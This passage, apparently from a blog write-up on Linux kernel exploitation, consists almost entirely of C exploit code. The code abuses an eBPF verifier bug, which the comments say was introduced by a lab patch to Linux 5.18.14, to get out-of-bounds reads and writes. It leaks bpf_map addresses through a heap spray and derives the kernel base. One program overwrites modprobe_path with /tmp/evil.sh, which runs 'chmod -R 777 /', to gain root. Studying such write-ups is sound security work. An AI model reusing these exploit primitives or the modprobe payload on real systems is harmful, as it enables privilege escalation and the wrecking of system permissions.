      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET;
  printf(&amp;#34;[+] kernel_base: 0x%016lx\n&amp;#34;, kernel_base);

  const char* new_modprobe = &amp;#34;/tmp/evil.sh&amp;#34;;
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf(&amp;#34;[*] Overwrite modprobe to %s\n&amp;#34;, new_modprobe);
  for (size_t i = 0; i &amp;lt; new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROB_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open(&amp;#34;/proc/sys/kernel/modprobe&amp;#34;, O_RDONLY);
    if (fd &amp;lt; 0) {
      fatal(&amp;#34;open(/proc/sys/kernel/modprobe)&amp;#34;);
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf(&amp;#34;[*] new modprobe: %s\n&amp;#34;, modprobe);
      puts(&amp;#34;[-] Failed to overwrite modprobe&amp;#34;);
      return -1;
    }
    puts(&amp;#34;[+] Successfully overwritten modprobe&amp;#34;);
  }

  puts(&amp;#34;[+] Get root&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;#!/bin/sh\nchmod -R 777 /&amp;#39; &amp;gt; /tmp/evil.sh&amp;#34;);
  system(&amp;#34;chmod +x /tmp/evil.sh&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;\xde\xad\xbe\xef&amp;#39; &amp;gt; /tmp/pwn&amp;#34;);
  system(&amp;#34;chmod +x /tmp/pwn&amp;#34;);
  system(&amp;#34;/tmp/pwn&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h3 id=&#34;leaks&#34;&gt;Leaks&lt;/h3&gt;
&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-adjust_ptr_min_max_vals&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using &lt;code&gt;adjust_ptr_min_max_vals&lt;/code&gt;&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;546928317&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;546928317&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_adjust_ptr_min_max_vals.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-oob-read--heap-spray&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;376148295&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;376148295&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf1 - 1),  // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  memset(buf, &amp;#39;a&amp;#39;, 0xf0);
  buf[0xf0] = 0xa0 - 8;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t bpf_map_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      bpf_map_addr = val - 0x110;
      corrupted_map_fd = cur_map_fd;
      continue;
    }

    close(cur_map_fd);
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

